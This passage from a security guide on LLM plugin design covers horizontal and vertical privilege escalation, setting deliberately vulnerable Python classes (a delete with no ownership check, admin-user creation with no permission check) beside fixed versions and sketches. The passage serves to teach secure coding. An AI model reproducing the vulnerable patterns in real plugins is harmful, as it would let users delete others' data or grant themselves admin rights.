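print(response["ok"], response["error"])
```

The caller can quote the error_id to an operator, who finds the full traceback in the logs, while the table name never reaches the LLM or the user.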
17.4.4 Privilege Escalation
Horizontal privilege escalation
# VULNERABLE: No ownership check
class DocumentPlugin:
    def delete_document(self, doc_id):
        self.db.execute("DELETE FROM documents WHERE id = ?", (doc_id,))

# Attack: User A deletes User B's document

# SECURE: Verify ownership
class SecureDocumentPlugin:
    def delete_document(self, doc_id, user_id):
        # Check ownership
        doc = self.db.query(
            "SELECT user_id FROM documents WHERE id = ?",
            (doc_id,)
        )
        if not doc:
            raise DocumentNotFoundError()
        if doc['user_id'] != user_id:
            raise PermissionDeniedError()
        self.db.execute("DELETE FROM documents WHERE id = ?", (doc_id,))
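The ownership check and the delete can also be folded into one statement, which removes the gap between them. This is a sketch against an in-memory SQLite table with made-up rows; the function signature mirrors the secure version above, but the implementation is an assumption.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE documents (id INTEGER PRIMARY KEY, user_id INTEGER)")
conn.executemany("INSERT INTO documents VALUES (?, ?)", [(1, 100), (2, 200)])
conn.commit()

def delete_document(doc_id: int, user_id: int) -> bool:
    """Delete the document only if it belongs to user_id."""
    with conn:
        cursor = conn.execute(
            "DELETE FROM documents WHERE id = ? AND user_id = ?",
            (doc_id, user_id),
        )
    return cursor.rowcount == 1

cross_user = delete_document(2, 100)   # user 100 targets user 200's document
own_document = delete_document(1, 100)
remaining = [row[0] for row in conn.execute("SELECT id FROM documents ORDER BY id")]
print(cross_user, own_document, remaining)  # False True [2]
```

A failed delete does not reveal whether the document is missing or belongs to someone else, which avoids leaking the existence of other users' documents.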
Vertical privilege escalation
# VULNERABLE: No admin check
class AdminPlugin:
    def create_user(self, username, role):
        # Anyone can create admin users!
        self.db.execute(
            "INSERT INTO users (username, role) VALUES (?, ?)",
            (username, role)
        )

# SECURE: Requires admin privilege
class SecureAdminPlugin:
    def create_user(self, username, role, requester_id):
        # Verify requester is an admin or super admin
        requester = self.get_user(requester_id)
        if requester['role'] not in ('admin', 'super_admin'):
            raise PermissionDeniedError()
        # Prevent role escalation beyond requester's level:
        # only a super admin may create privileged accounts
        if role in ('admin', 'super_admin') and requester['role'] != 'super_admin':
            raise PermissionDeniedError()
        self.db.execute(
            "INSERT INTO users (username, role) VALUES (?, ?)",
            (username, role)
        )
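When there are more than two or three roles, chained if statements become easy to get wrong. A ranked role table is one way to express the rule; the sketch below uses a stricter policy than the code above (a requester may only create roles strictly below their own), and the role names and ranks are assumptions.

```python
# Assumed role hierarchy, lowest to highest.
ROLE_RANK = {"user": 0, "admin": 1, "super_admin": 2}

def can_create(requester_role: str, new_role: str) -> bool:
    """Allow creation only of roles strictly below the requester's own rank."""
    if requester_role not in ROLE_RANK or new_role not in ROLE_RANK:
        return False  # unknown roles are denied by default
    if ROLE_RANK[requester_role] < ROLE_RANK["admin"]:
        return False  # ordinary users cannot create accounts at all
    return ROLE_RANK[new_role] < ROLE_RANK[requester_role]

checks = {
    ("admin", "user"): can_create("admin", "user"),
    ("admin", "admin"): can_create("admin", "admin"),
    ("super_admin", "admin"): can_create("super_admin", "admin"),
    ("user", "user"): can_create("user", "user"),
    ("admin", "root"): can_create("admin", "root"),
}
for pair, allowed in checks.items():
    print(pair, allowed)
```

Denying unknown role names by default matters here because the role string ultimately comes from LLM output.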